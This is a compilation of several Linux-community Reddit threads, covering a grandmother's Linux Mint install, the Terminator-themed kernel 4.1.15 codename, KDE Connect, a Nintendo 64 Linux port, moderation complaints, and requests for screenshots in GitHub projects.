Concerning USB booting; if the device came with Windows 7 preloaded, I find it very difficult to believe it can't boot via USB.

For future reference, if you can't get the MB to recognize a bootable USB, ensure that Legacy USB mode is enabled, and secure-boot is disabled. This was most likely your issue.
I installed an SSD and linux Mint XFCE for my mother in-law in an older HP Desktop before this covid lock down. she uses it for Facebook, recipes, and web surfing, I had moved her ISP email to be pulled with gmail since she has a chromebook and can access her email on both devices. Was able to get her cannon printer setup pretty easy as well. She likes the fast boot up times compared to win 7. Have not had to do much with getting to work for her. she picked it up pretty well.
Ah I remember when my grandma was using ubuntu, i think it was 16.04. and that was still on unity. Probably would go even better now if I did it with dash to panel and just gnome
[deleted]
Why your grandma is named Linux, and what did you taught her?
cp 
dkpg
That's wonderful !

Not only kudus to your grandma for willing to go along with the change, but I love to read other people stories for re-purposing older machines (so, kudus to you for your hard work).
i taught my grandma how to use android, and i think she enjoys the mini recipe tutorial television in her pocket. she can even convert mp4 to mp3 on her own! idk if this is impressive, but most grandmas wont even dare touch a phone
Its great until your grandma calls you about compiling gentoo.......
Similar history with my mom!  
Old computer, New SSD, Fresh install of Xubuntu. Perfect for surfing the internet and writing some documents.    
  
  

>Her computer did not have the capability to boot from USB  
  
Also went through this.  
There's a app for Android called [DriveDroid](https://play.google.com/store/apps/details?id=com.softwarebakery.drivedroid). It requires root and makes your Android Device behave like a Bootable USB Stick, so you can boot your computer with whatever .ISO you have on your phone's storage.
In the settings, you can make the app simulate a USB DVD Drive, instead of a USB Stick.  
I activated the setting, plugged the phone in and it worked! The computer recognized my phone as a CD Drive and booted the .ISO just fine. Never though it would work!  
If you find yourself booting old computers often, a CD with Netboot.xyz could also come in handy.
I'll start this by making clear that I'm not a "Linux hater" - far from it, I'm actually using both Windows and Linux daily. For decades. With that said...

It's hypocritical and just plain wrong acting as if it was "the upgrade to Linux" that made her computer all fast and snappy. You upgraded her PC to a new SSD for crying out loud - even the PS3 and Xbox360 see an improvement in load times when you replace their HDDs with SSDs! Posting about how Linux "made an old machine usable again and its owner happy" when it was the hardware upgrade that came with it that made all (OK, "most of") the difference is just... wrong.

I must stress that I'm not bashing Linux, just pointing out that this post is not representative of why Linux can be great. When you're comparing two things, you must use the same metrics and keep all factors identical. To say that "Linux boots faster" you must use THE EXACT SAME HARDWARE when comparing it to Windows. For if you replaced an HDD with an old version of Red Hat with a new SSD where you'd install (drumroll) Windows 98, lo and behold, Windows 98 would be faster!

So, nope, Linux may be helping in better boot and response times, but 99% of the difference is because of the SSD, not the OS, at least in this specific case.
> Upon entering the boot menu, I realized my fate. Her computer did not have the capability to boot from USB.

I hope you'll forgive me for saying I'm convinced you must be mistaken - the ability to boot from USB was common by the time Windows 7 was introduced.

I think most motherboards are manufactured by a handful of companies (and BIOSes by only a couple?) so I'd expect them to universally support it.

However you often have to have the USB inserted before you can selected it in the BIOS boot order, at least when it comes to boards of this era. You might need to enable USB bootable devices in one submenu before they show in the separate boot order menu.
Make a plop disk, never worry about USB boot again
Yo. That is so darn cool. I can't even teach my older brother how to use Linux.
Are you sure that the PC doesn't boot from the USB? I thought the same of my PC, until I discovered that the USB is shown in the BIOS like a "hard disk drive" instead of a "removable".
Resurrecting an old laptop with a lightweight distro is seriously one of the most effective "conversion" opportunities ever. Glad to hear that even your grandma has been happy with it!
Linux is much easier to use the windows.  Your files are in your home directory not scattered around the machine.

applications install to a known location.  Configuration for the user is in a simple file not a complex database.

Things just seem to work
Congratulations, when you have time to install Arch Linux with Deepin desktop, you will love it ...
The post was strangely very wholesome.
Same with my dad. I was sick of fixing his windows install all the time, so about 5 years ago I just installed mint and removed just about everything other than Firefox and Libre Office. He seems to use it just fine, and we have never had issues. Sort of like my own rigged up chrome OS
I have a similar setup on Dell Vostro 1500. I put 512GB EVO on it. 

Just a couple tips:

* If you have extra dollars to spend, get her an external drive for backup.
* Next time you are shopping around for SSD, consider get one from the NAND manufacturers such as Samsung, Toshiba, WD/SanDisk, or Micron. They tend to be more reliable than the third party ones. But regardless the quality of the storage, always have a back up.
Did the same with my mother when she was alive. I installed linux mint on her computer and she loved it.
Couldn’t enable USB boot in the BIOS ?
May have been that you set up the USB as a UEFI install instead of legacy.
Does he plan on allowing 'others' to rwx as well?
My mum is 83...I've had her happily using Ubuntu for years.
> Chrome

Oh god.

Please get her Firefox with uBlock and Facebook container
good job man.

i can't even teach my parents how to use a normal windows machine..
"I taught my grandma linux!   Now,  here's a 2 paragraph install summary unrelated to my grandma or the title"
Just don't teach her how to use commas, since you clearly don't know
Sometimes a lack of speed is better than needing to relearn an OS, especially at 77 with dimentia.
Title is a lie, you configured it for her and she's now using it. Just wait until she has to bash half a dozen lines to do something that should be plug and play.
So she loves SSD, not Linux.
Sounds like you taught her the basics of the Gnome desktop (or another, you don't say which).  Which to me is not the same as teaching her Linux.  Just saying.
The kernel running on the T-800:

http://i1-news.softpedia-static.com/images/news2/Arnold-s-T-800-Terminator-Runs-Linux-Kernel-4-1-We-re-All-Doomed-473236-2.jpg

The newest LTS kernel:

https://cdn.kernel.org/pub/linux/kernel/v4.x/linux-4.1.15.tar.xz
If skynet runs on CentOS  we have a lot of time to organise the resistance :-D 
And even the date on the files is close: Dec 19
That kernel link is definitely staying blue
The kernel release codename was updated to "Series 4800", a direct reference to the Terminator series

>In the original script for The Terminator, Kyle Reese referred to Skynet as a "modified Series 4800".

http://terminator.wikia.com/wiki/Skynet#Notes

Linux kernel `Makefile` for version 4.1.15:

>     VERSION = 4
    PATCHLEVEL = 1
    SUBLEVEL = 15
    EXTRAVERSION =
    NAME = Series 4800

https://git.kernel.org/cgit/linux/kernel/git/stable/linux-stable.git/tree/Makefile?id=refs/tags/v4.1.15
[Apparently Robocop runs on MS-DOS](http://images.pcworld.com/news/graphics/200319-robocopcommand606_slide.jpg)
Fun fact: Skynet 5 military communications satellites were put in orbit by the UK in 2012, and they have Nuclear hardening, anti-jamming countermeasures and laser protection..
It's funny how text-based interfaces are always extremely distracting in movies, the opposite of what you want in real life.
Well, I hope that the developers have included a backdoor in this release, given that they were advised.
It actually makes sense, given [last movie spoiler](/s "that the timeline in Genisys portrays Cyberdyne as a social networking tool.")

However, I'd expect some FreeBSD body guards around the mainframe. But they'll all be running ReiserFS.
Can't wait to own a GNU/T-800.
Am I the only one seeing that the font in the terminal is not monospaced? I feel like I'm taking crazy pills D: 
According to Terminator 2, the world ends on August 29th 1997. I saw the movie for the first time on August 25th 1997. I was 12.

For four days, I had this strange feeling of doom...same feeling as right now.
Wow, first Back to the Future Day and now this.  It's like we're living in the future that 1980's filmmakers imagined. 

Except a more mundane version that doesn't have hover boards, self-fitting clothes, or virtually indestructible death machines annihilating humanity.
Obligatory, "I for one, welcome our new robotic overlords".
what is the node name?     
sfxxxx.sky.net  cant quite make it out.
Wasn't Terminator released in 1984 and the first Linux version in 1991? Or am I missing something?
This title confused the crap out of me. I thought you were referring to the best terminal emulator in the world, not a movie about robots.
Surprised it isn't running BSD.
Omg, it was the binary blobs all along! I knew it!
Heh, never realised that was there.
4 years to soon. 
meep
someone should clone and make the exact version number for distribution fun.
They should have included a little optional message that when you log out, it would say: "I'll be back"
Which movie is this from?
Please tell me they named it something terminator themed 
People [got pretty upset](http://thread.gmane.org/gmane.os.freebsd.stable/88197/focus=88311)
when the FreeBSD folks indulged themselves in a similar
joke not long ago.

I'm missing skynet in Linux kernel...
In that first screenshot i don't see the Linux version but I noticed all files are 0 bytes long.
Of interest is that he 4.1 kernels can self heal and self update, much like...Noting to see here pay no attention to this madman, fellow humans!
At least skynet is RMS approved.
Should this be installed in some sun t1000s?
I'm a bot, *bleep*, *bloop*. Someone has linked to this thread from another place on reddit:

- [/r/linuxactionshow] [Remember the kernel version in Terminator? It's finally released. (xpost from r\/linux)](https://np.reddit.com/r/LinuxActionShow/comments/3wxnw0/remember_the_kernel_version_in_terminator_its/)

[](#footer)*^(If you follow any of the above links, please respect the rules of reddit and don't vote in the other threads.) ^\([Info](/r/TotesMessenger) ^/ ^[Contact](/message/compose?to=/r/TotesMessenger))*

[](#bot)
[deleted]
[Good thing we know who will be delivering the _skeletons_ for the Terminators](https://en.wikipedia.org/wiki/Cyberdyne_Inc.)
Also Sata drives..lol.  SSD's of course.  Mech drives wouldn't work for Terminator use.  Even just normal walking or whatever and the Terminator is dead due to HD failure. 
which movie is this from?

Still requires patching from Skynet itself though.
I thought the Terminator ran on a modified Apple ][ - [pagetable](http://www.pagetable.com/?p=64).
haha that's funny it would run on Linux not Windows, owned!
I was sitting here in my apartment jammin to some sweet Bob Seger best of on youtube when 'Like a Rock' comes on. I'm rockin out, as I do, on my Fedora gnome-shell install... then all of a sudden I glance at my phone and KDE connect is in my notification tray showing me that Beb Segur is indeed what I'm rockin' out to.

play/pause button and all... it actually works

So this is Fedora + Gnome + KDEConnect + Firefox (I assume via Dbus?) all "just working", no user input whatsoever... this might be the first time a Linux DE has given me a "just works" feel; and it was powerful.

So to anyone who works on any of that integration pipeline (or really anywhere else in the \*nix desktop environment world), then kudos to you. It's *really* starting to work

edit:

also I want to thank those people doing yeoman's work on gsconnect (thanks to u/solongandthanks4all), writing firewall-d service defintions and selinux policies, those are things that are so unnoticed but so important to the "just works" but "still safe" aspect.
KDE Connect is even more stable than Microsoft's "Your Phone" app. Incredible!

They've really made a great job with KDE Connect.
My 2 favorite KDE Connect features are universal copy-paste and pausing media when the phone rings. It just works and it's great.
Don't forget to give credit to the author of GSConnect who made the GNOME integration possible!  I've been using it for over a year now, it's fantastic.  I particularly love the recent feature that syncs when you clear a notification, either on your point or your computer.  Outstanding!    I just wish GNOME would add notification grouping support.
Just wait for when bluetooth/wifi mixed networking will be up in the cards ;-)
KDE connect is the reason why I can't switch back to Windows lol
It's actually the "killer feature" that has me considering switching my home box to kde. I've used xfce for years, but did a fresh install of kde debian at work, and really liked it. I still like xfce, but it would be nice using kde connect at home.
Over the past few years I've actually started recommending Ubuntu to casual computer users, because as you said, a lot of linux really does appear to be approaching the "just works" stage. In fact I'd go so far as to say that Ubuntu generally "just works" more than Windows 10 does these days. And that's equally as much of a complaint of Windows 10 as it is a compliment for Ubuntu and linux in general.

And when something does go wrong these days it's always much easier to solve on linux, and more importantly is nearly always solvable. Whereas with Windows 10 the problems are often so hard to debug that solving them becomes very hard or impossible sometimes. Family members who I have transitioned over generally have fewer problems now (and much better performance, as many are on older hardware).

Microsoft seems to be transitioning to a more of a rolling release model and it has frequently in recent years caused so many computers to just suddenly stop working because their update broke everything. I think that either Windows 10 or the next version of Windows will be the last version. Instead, it will just be "Windows" (or Windows One or Windows Series or some other weird shit knowing MS) and I also think it will be free.
It's amazing, though I've had some minor issues.

Like SMS suddenly not working, and the presentation remote pointer getting stuck all the way on the right side of my screen. (Granted, I've never really needed the presentation remote, it was just a fun gimmick for me)

But everything else works wonderfully, and the latency to do things like media control is almost imperceptible.
the best thing here is that this is happening as I've been debating what to do w/ my Google Music account... youtube has been beligerently boethering to swtich to their shit music for 1+ years and I will absolutely not do that. Spotify, is... sighh....

I've decided I'm just setting up all of my library on my workstation to stream over my home lan and remotely over vpn. I'll use pulseaudio/nginx over rtmp to stream remotely and kdeconnect to use this as my primary player
Cool; it is on F-DROID for those ungoogled folks.
KDE Connect for when Android MTP USB connect fails
Agreed, KDE Connect is wonderful!
I rely HEAVILY on KDE Connect, as someone prone to hyperfocus. I would never notice messages and calls, if KDE didn't plaster them in front of my face.

And no, I can't have the sound turned up on my phone, don't be ridiculous. I hate that too, lol.
yup, shared clipboard and No hassle File transfer are my 2 favorite features on it.

That aside, how do you deal with starting kdeconnect after connecting to the mutual/hotspot network? 
It wont start working untill I reconnect android to the network.
The only thing I don't like about KDE Connect is that it will just randomly show you every notification your phone has ever received.
I really wish I could use it, but sadly I'm on an iPhone. I really wish apple was more open with its architecture so KDEConnect could be brought here. I've noticed a few new projects (sandcastle Linux) to bring a Linux OS to apple hardware. Hopefully once it's stable I can install it and get KDE connect as well.
KDE connect is what sold me on the KDE desktop environment. Every system in my house, plus my wife's computer at work run Kubuntu
KDEConnect is fucking amazing. I was legitimately looking for the features it offers on windows and couldn't find an app for it. I come to linux and lo and behold, it's just there and it just **w o r k s**

Like, I don't want to have to go to my phone to check my SMS messages. It's just so great that I can have an app that allows me to check them on my pc.
kdeconnect/gconnect is awesome but I think the protocol needs to be updated to handle multiple users on a machine. 

My phone connects to my session. Another person in the house switches users to transfer some files off their phone and gsconnect won't work as the socket is in use. They have to log out, then log me out then login. It is kind of annoying. I know you can have multiple devices attached to a single login but this is an issue with them connected to multiple simultaneous logins on the same pc.
KDE Connect/GSConnect on Ubuntu is soooooo lovely. Use it all the time! Have it setup to mute my speakers, pause video and mute my mics when a call comes in. It's like I'm some kind of rich executive where everything needs to stop when a call comes in!
[deleted]
I love it. File transfer works like a charm. Only thing is that sharing my clipboard from phone -> laptop no longer works, but does the other way around. Does anybody know a fix?
KDE Connect is easily one of my favourite features in the suite. It's such a great app, thank you all for your work!
I love KDE Connect.

I use KVM a lot and it takes a second to switch between guest and host with my KVM switch, KDE Connect lets me run commands from my phone, share files, control volume, etc. And most importantly it just works.

Tried using other software before, but they always had privacy-invasive requirements and just in general weren't reliable.
I have issues with KDE Connect.

- On Plasma, KDE Connect keeps showing the wrong icons for notifications, e.g. it shows a Twitter app notification with the wrong Twitter profile icon, that icon was actually supposed to be shown on a previous notification.

- It also likes to re-send all existing notifications from time to time, so if you have 20 notifications on your phone, you will keep get spammed with duplicates of them every several hours...
It also works wonderfully on my Arch KDE Plasma install, definitely recommend anyone to try it at least once if they haven't yet
Agreed.

I really like that it relays texts and I can often respond to it from my desktop. My wife likes to text me quite a bit, so I have it set up on my laptop and desktop so I no longer need to unlock my phone to answer her texts. It's fantastic! I've used the play/pause functionality quite a bit too. I also love how the Steam Guard prompt comes through as well, which means I don't need to dig out my phone each time Steam wants me to log in again.

So yeah, hats off to everyone who works on KDE Connect.
Cool, but I can't pair/detect devices anymore on Ubuntu 20.04. Tried adding firewall rules, settings reset, reinstall, f-droid/play versions, etc. - nothing works :(
Absolutely love KDE connect. I also even Tasker on my phone with AutoVoice and AutoInput to map the Google Assistant command- "Shut down my computer" - to  the Shut Down command of KDE connect. I love it haha!
I LOVE kde connect. I actually don't have it on my laptop proper, but I have it on the box that powers my my TV (in addition to doing some server stuff) and I use its "remote input" feature to drive it from the couch. It's fun to have a full-fledged linux PC as my entertainment center! And the remote input "just works" in a way that I never would have suspected. With very low latency, too—even when connected over my VPN, which means a hop out of my LAN and back! It's fantastic.
I've commented about this before and I have to do it again. KDE Connect is an amazing piece of software!!!
Honestly, kudos to anyone who works on any KDE project. Lots of good things come out of KDE.
No problem my dude. I'm using i3wm more now adays, but it's been fun working on KDE for all these years.
I hate to ask this but does it work with iPhone? Sounds like a cool program
Does KDE Connect work with Gnome?  Or is there a Gnome equivalent?
Couldn't agree more, it's fantastic!
How does it compare to Join by Joaoapps? Feature parity or more or less? KDE Connect support SMS and MMS?
Before I install my development tools I install KDE connect first
I love it. I can run commands using my phone without SSH'ing or anything. It is the best thing that has happened.
Does one need bluetooth for this to work? Is it possible to pair over the network as well?
Is kdeconnect hardcoded for android? It would be so convenient to have one desktop be the server and connect other computers as clients like an android phone. Especially now with linux phones.
It's cool but I can't seem to get the copy from phone feature to work. I can browse the files on my phone, but once I try to copy any of them to the computer it errors saying it can't find the file.
I love KDE Connect too! I wish they would finish the Bluetooth stack tho, would be handy in school...
the stopping music on calls is the best. would love a vnc like remote mobile control that could be cool.
Sadly 2 of my favorite features are not working on kdeconnect

Sending text in the sms window

Or pausing the media when I am on the phone. It will either pause when I'm on the call but never resume once I'm off the phone..... Or just never pause to begin with.

And yes the plugins are enabled.
Absolutely rocks. Too bad I live in campus and the network discovery feature doesn't work here.
I just wish it worked via USB connection as well. My phone's WIFI adapter is kind of weak and I usually can't connect both my computer and my phone to it, but it is permanently docked and connected to an USB port in the computer when I'm off the clock. Sadly, this doesn't even register for KDE Connect, so I cannot use all the nice features when it's wired.

Unless there's some way to do it and I didn't notice, but I didn't seem to see anything related!
kdeconnect is godly!

i love the reply to messages feature by clicking on the pop-up. i think it was added a year or so ago. 

you would think that it would have only worked with the phone's SMS app but it also works with whatsapp! this makes it double supersonic since you don't have to open the goddamn whatsapp web page.
Bob Seger! Great call.
KDE connect is also the best Android file transfer app out there, by far. It's so seamless that nothing else comes close.

Also, you have excellent taste in music. Nothing beats Bob Seger.
Well the remote input doesn't work, it worked for the first try, then I shutdown my pc, and after that it didn't work but the other features do
Wait until OP finds out about Bluetooth audio from phone to PC.

Or able wacon tablets just working, even pressure sensitive!
I can't seem to get the windows build working :(
Why are you using Gnome?
Announcement:

https://lore.kernel.org/linux-mips/20201225190503.12353218812e1655f56f0bf8@gmx.com/T/#m0862c3484e0da7195dc8989421d30f01b3b1c63a

The N64 is now the oldest console able to run Linux.

Some previous attempted had been done in the past but never went as far as having a shell running.
The port uses musl and busybox to make it as lightweight as possible, although the OOM is never far away with 4MB of memory in 2020.

GitHub release: https://github.com/clbr/n64bootloader/tree/master/n64linux

In depth description of the N64 architecture: https://www.copetti.org/writings/consoles/nintendo-64/

-edit-

Additional info: [n64.dev](https://n64.dev)
Addendum: this also makes it the oldest console able to run a modern 64 bits Linux kernel (5.10).
Well there is the RAM expansion module that slots into the top, giving you a total of 8MB. :) Maybe if someone was hardcore enough, they could design their own RAM expansion module that provides much, much more.

EDIT: From what I understand, the N64 is very similar (but massively cut down) from one of those old SGI computers. Could someone not make modern Linux run on one of those? For example the SGI Onyx had a maximum memory limit of 16GB, which is insane for 1993, and even plenty good now.
Cool! Does anyone have a video?
It would be cool if it got some more homebrew support, it's fun experimenting using flashcarts

So far Doom and Wolfenstein are ported, scummvm was too but I was never able to figure that one out
> "But why", I hear from the back. Having Linux available makes it easier 

> to port emulators and fb or console games. 

> www.linux-mips.org/wiki/Nintendo_64 can be edited to no longer say "vaporware". 

> Most importantly, because I can. 


So glad they added "because I can".  This is seriously the best reason to do "pointless shit" like this.
>"But why", I hear from the back. \[...\]  
>  
>Most importantly, because I can.

Love this people!
it seems I have to take my N64 out of the attic. Back to business my old pal
Reminds me that there was a port of uClinux to the DS, which also had 4MB of RAM.  
I wonder if 5.10 would also run.
So a 30+ year old games console is running a newer Linux kernel than my Workstation on Ubuntu 20.10?
time to emulate n64 on an n64
[https://www.youtube.com/watch?v=pFlcqWQVVuU](https://www.youtube.com/watch?v=pFlcqWQVVuU)
Me: wow I'm surprised it can run a 64-bit distro 

Me slightly less than one millisecond later: you are an absolute buffoon
> I'm not sure if it's useful to have this merged. Old,
niche, and limited platform.

Every toaster should be running Linux.

... unless it's IoT crap.
Wtf

And here I thought the PS1 was the oldest one.

Granted it was uCLinux because PS1 lacks an MMU so you could argue it was a different branch entirely...
Pretty cool.

Is there anyone that has a use-case for that? Or did they just said "fuck it why not?" (which is a perfectly fine reason to do it)
I had to do a double take to make sure it wasn't April 1st. Holy hell.
Ight me is dumdum... so now we can run an N64 emulator on a Linux that's running on an actual N64 (in theory) ...... talk about meta jokes amirite?
Linux is supported by my 25 year old Casio calculator.

*Statements made may not reflect reality.*
Could this enable running n64 ROMS natively on the console without buying hardware like an EverDrive?
Awesome! Now I can install Retroarch on it and play some Ocarina of Time and Mario 64!
Finally!
Really nice, but what is the practical use except tinkering and fun?
Nintendo: "GET NY LAWYERS!"
Omg yess, what about Nintendo 3ds?
Linux is like doom, the community will find a way to get it to run on anything (except we can run Linux on a toaster, checkmate doom. (Waiting for a guy in 5 minutes to come and  get doom to run on a toaster))
Oh wow, that’s cool. I’m guessing it would be super laggy with 4mb ram but at least it works! I would try it but I’m too young so I don’t have an n64 😂
Love ❤️ it
I'd like to see NetBSD run on n64
[deleted]
If the SNES or NES can do this I'll be very amazed.
"supported" sounds like there is a company standing behind this port.
Nice I need a N64. Emu on my pinephone
But why though?
Why lol?
There was a [nice discussion going on about the data collection practices of Ubuntu](https://www.reddit.com/r/linux/comments/7yiyet/ubuntu_to_include_optout_user_data_collection_in/) with 300 comments. Suddenly a mod decided to close the discussion, just because he happened to find a duplicate from 2 days ago with 30 comments. Seriously?
[deleted]
A couple of days ago I posted an observation about the non-intuitive actions of the "find -size" command.

https://www.reddit.com/r/linux/comments/7y88ed/massive_find_gotcha/

It has been removed, and I was advised to go to /r/linux4noobs.

I am **not** a noob! I have 30 years experience of UNIX and 20 of Linux. I've even had a thank-you from Linus himself after finding and git bisecting a bug, then helping with the testing of the fix. That's on top of the bug I discovered 10 years ago where a single network packet would crash the kernel.

I'm a mod on /r/linux, and got the job way back when someone was looking for volunteers.  It's not a fulfilling job by any means, and if I'm representative of the other mods, it's a labor of love.

I've removed a few posts that (IMO) had nothing specifically to do with Linux (mostly related to more general "Internet" content like Firefox, GPL, LetsEncrypt, etc.), but I usually default to letting the voters speak.

One thing I do find interesting is how many of the most popular posts aren't very Linux-y, but that's because there's not much Linux (kernel) related news.  I'm looking back at the most popular posts over the last year, and number 1 is VLC, 4 is encryption, 6 is mp3 patents, 7 is open code and government (more open source than Linux), etc., etc.  People on this sub seem to enjoy and upvote news that Linux people would be interested in, but not necessarily Linux-related news.

I appreciate this conversation, and if I could ask one thing, it'd be to assume that the moderators take no action out of maliciousness, unless investigation proves otherwise.

They leave up tons of posts that have Jack shit to do with Linux.
The tide comes in, the tide goes out, you can't moderate that!
At least they provided a link to the duplicate. Not all subreddits' mods have the basic courtesy of doing that.
the mod was a bit late to the party, but if you're subscribed to multiple linux-related subreddits, really becomes a bit too much when every sub has multiple submission of this with no added value. there's a reason why the rules of /r/linux encourage us to report "spamblog submissions".
It really doesn't seem like anything malicious. Did you message the mod first, or did you just create this post in reaction?

It's not like he's trying to hide the discussion to shill for Canonical or anything. Mods make mistakes sometimes. Just about every other sub has *much* worse moderation.
eh we're just trying to emulate the arch linux forums
Probably works for stackoverflow
[deleted]
Yes, If only there were some mechanism by which users could control which content appears prominently and which content is not good. 
You're shocked there is pedantry among Linux users with a dash of *my pet favorite*?
Welcome to tech related boards. It doesn’t matter how ridiculously out of spirit a rule is being applied, it will be applied with cold robotic precision. Im just going to assume the mods made a clever bot to do their job for them so they could play warzone2100 or freeciv or simutrans

If you think /r/linux is bad, try /r/netsec. I've never successfully submitted to /r/netsec, even on Meltdown/Spectre, and to be clever and funny they prefix their removals with "reject:".

I asked to be banned last time I ended up in modmail.
I tried to raise discussion about some seeming market manipulation and it was removed due to mentioning eth as a comparison instead of usd.
I guess it would be interesting to see the list of zapped submissions from this sub.
As somebody willing to give Linux another  try after a couple of years of Win10, are you saying that Ubuntu, and Mint, are doing the telemetry bullshit?
In honestly, the moderation here bothers me a lot.  I mean, this sub is hardly hugely prolific.  it's not like my front page is full of linux crap fro this sub, and I am not obliged to read the comments on anything. 
Thanks mods.
Probably just someone missclicked, as it doesn't seems to be locked anymore.
At least it isn't /r/linuxmasterrace where 90% of the posts are garbage Arch memes
Reddit overall has become toxic and politically correct since 2 or 3 years like anyone would expect from a company whose only interest is money
I couldn't agree with this sentiment more if I tried.

Removing an active, popular thread because there's been a similar discussion previously is completely silly.

In fact, removing anything for having a single duplicate is silly: it's not like we're a crazy high traffic subreddit: the front page still has posts from a couple of days ago. There's absolutely no need to close threads this zealously.

Mods: please don't close good, active discussion for arbitrary reasons. There's a time to implement the letter of the law, but this kind of scenario isn't it.
I agree. They removed the fail0verflow video of Plasma on the Switch, claiming it's a dupe of an 11 days old submission from long before they had Plasma running and obviously without the window. 700 upvotes and dozens of comments in. Ridiculous.
Mods' autism 
This sub never has any meaningful discussion. I usually just use it as a Linux news source.


While I don't always agree with the moderation actions here, I can see where and why the mods do what they do. I've seen a lot of these mod complaint threads over the years and it always comes down to this: **a highly upvoted thread with lots of discussion that gets closed**.

The reasoning is usually justified within some sort of laxly applied rule. But I implore the mods to take a step back when they see such posts. Those discussions weren't rehashes and were genuinely good for the community. So even if they could be closed, it doesn't mean it should be closed.

Some hard reasons to back up why I say this.

On Hacker News, the mods and users publicly state that reposts are allowed because timing has a lot to do with whether or not a topic gets recognizing and draws in discussion. So worthwhile topics often due early a few times before being submitted at the right time.

Also, with their flagging and duplicate/close system, they have the ability to merge discussions into the original thread. Then leave just a sticky to redirect people. You can't do that on Reddit so closing as duplicate here is a much more hard handed move. Especially when they are flat out removed. Hence why I say please consider the discussion at hand before taking action. 
Mods here are now even shielding a bully: https://imgur.com/OgMWS2V
Do you see multiple offenses like this? Usually authorities want to be notified by repeated bad/unprofessional behavior. 
I find the moderation mostly great in this sub-reddit. it is needed to keep out the blatent blog spam like omg!ubuntu. 
Had a similar issue in legaladvice.  Probably going to move to voat.
Start your own sub and moderate as you see fit.
I mean, you can hardly see any screenshots on Github or other pages at all. I would say 90% of the projects lack any screenshot, animated gif or, Penguin forbid, video.

And this goes to not only GUI programs but TUI programs too. I mean, making a screenshot on Linux in 2016 is a trivial thing and still the visual blindness and ignorance of the visual presentation is... very big ;)

Please, even if you are "visually blind" programmer, consider uploading at least one screenshot per your program, even if it is a text based program. The others aka "unblinders" will appreciate that. Thanks.
>I mean, you can hardly see any screenshots on Github or other pages at all. I would say 90% of the projects lack any screenshot, animated gif or, Pinguin forbid, video.

This annoys me to no ends, especially if it's like a gtk2 theme on github.
> The others aka "unblinders" will appreciate that.

You mean... (shudder) users
Add to that, they usually lack a clear and succinct definition of what the project actually **is**.
You need no screenshots when you can look at the source code! /s
[deleted]
I don't really understand what your issue is. Could you provide a screenshot?
Honestly I agree... Even for a text based application, I show an image of the typical output, for example, [here's my mpvc README](https://github.com/wildefyr/mpvc).
I usually just use google images to find one, but agreed, if you make anything UI based at least put a screenshot up
I have the opposite complaint: Too many shiny new open source projects, especially textual ones specifically made for programmers, have shiny screencasts and zero documentation. I can't even find out WTF their project is supposed to be without putting on headphones and listening to some guy talk about their project (and type badly) for 5-10 minutes, instead of spending 30 seconds with a decent README.

That's assuming I even find your project. Videos are way harder to index than READMEs. Even screenshots are way harder to index than just copying and pasting the text from your terminal and setting a fixed-width font.

For a GUI program, absolutely. But even there, at least have a README and some screenshots alongside your screencasts.
Sounds like a great opportunity for people to contibute a screenshot pull request.
For GUI apps screenshots would be useful, but I really don't see any need of screenshots for command line programs. A proper readme file is far better.
If you're already on Github, why don't you add a screenshot in a PR yourself or at least create an Issue while you're at it? Takes virtually no time and contributes to the community.
Had to read this a couple times through because of the overuse of the word blind. First couple of times, I thought you were speaking on behalf of blind users, wanting to understand how to use text based software, but then you asked for more pictures...
File a bug report or submit a merge request to fix the issue. /s
And here I thought for a moment we get another designer vs developer GUI debate :D 

At the topic: Yeah you are completely right. Screenshots would be a great help for the first impression. No reason to download the program (and cost the host unnecessary bandwidth) if the interface is a instant "nope". 
You could contribute some screenshots and captions to the projects?
SafeTemp did it: https://github.com/ArlingtonBrooks/SafeTemp/wiki/SafeTemp

Although if the software doesn't have an interface like this program (for example, if it's ffmpeg), a screenshot may not be very helpful.
A lack of screenshots I will give you. But if I have to sit thru another 20 minute video that would take a half page of text to explain the same thing I will stab people in the face.
Well, you know, github is a source code repository - it's nice that you can set up a front page there for your work, but it's not a store front.  Moreover people working on free tools for linux are rarely the same sort of people who want to sell software as a small business - those people are (for obvious reasons) more focussed on  Windows, Mac, Android and iOS.  Which is to say that they don't really have the same motivation to market their wares (nor do they get the same rewards for doing so).
[deleted]
Start a list with such repos, then post it one day here so /r/linux could provide screenshots via pull requests 
We live and die by the command line.  We pray to the ASCII gods.  
I'm sort of a linux noob, but I believe the beauty of open-source shit is that it's collaborative and if you aren't satisfied with a project you can't simply fork it and do what you like with it ...

So while I think it's fine to make a request, you could also be contributing by doing these things yourself.  
There once was a site, "lynucs.org", now dead, which I always used to "see" applications. The idea was simple. It had screenshots, all of which were tagged by the applications which were visible on that image.

It was great. Very often the screenshots contained more than one app. I discovered things like gkrellm and conky with that.

A real shame it's dead 🙁
~~Perhaps your contribution to their project could be to make those screenshots. I'm sure it would be appreciated.~~

Sorry; bad mobile signal.  But double rainbow accepted.
Perhaps your contribution to their project could be to make those screenshots. I'm sure it would be appreciated.
Erhm, [screenshots.debian.net](http://screenshots.debian.net) already exists and does exactly what you are looking for.

The screenshots are even linked on every package's PTS page and in the package search directory.
Maybe we're looking at different projects. Most projects I look at have a working demo at the top of their readme.
most indie devs are kinda on the lazy side. They'll develop something, but after that they just dump code somewhere.
Coming from the Node.js community, I can say I can really appreciate the many github README.md's that have screenshots or animated gifs of their output.

Some examples I remember or ripped from recent tweets about new packages:

* https://github.com/sindresorhus/cli-spinners
* https://github.com/maxogden/menubar
* https://github.com/addyosmani/tmi
* https://www.npmjs.com/package/supererror
* https://github.com/maxogden/datop#datop
Screenshots for a CLI app?  Does not compute.  I'd be happy if projects would include man pages though.
A theme without screenshots is annoying as hell.  
Github is a site for hosting and distributing source code, it is not intended as a software store.
Github is not amazon. Projects don't exist to please you. Most are private projects which are made public and people don't care if other use them, or understand them or even know if they exist. 
For many/most projects, GitHub isn't intended to be the main, public-facing presence for the project. The vast majority of mature, production-ready projects have their own websites for that. 

Also, videos suck. They're reasonable for quick overviews, but for detailed information or tutorials, text and pictures are easier to refer to and reread, can be followed at your own pace and can be linked to related content much more easily. 
While it couldn't hurt, usually I base my decision on features listed, popularity, project activity, and whether that application is already available in my distro's repository.  Then I just install the thing and use it to see if I like it, or if I dislike it enough to begin searching again.

Just today I thought of a hardcore Linux user watching a video by looking at a stream of bits. Lol
Gotta make sure UX and OSS never cross paths, right? 
Someone finally said it.
An interesting twist on modern times -- what once was a handicap among programmers (insufficient text literacy and attention to detail) is now portrayed as an advantage. Those old-fashioned programmers who could efficiently immerse themselves in project details and reliably produce working code, are now described as handicapped for not being ... "visual".

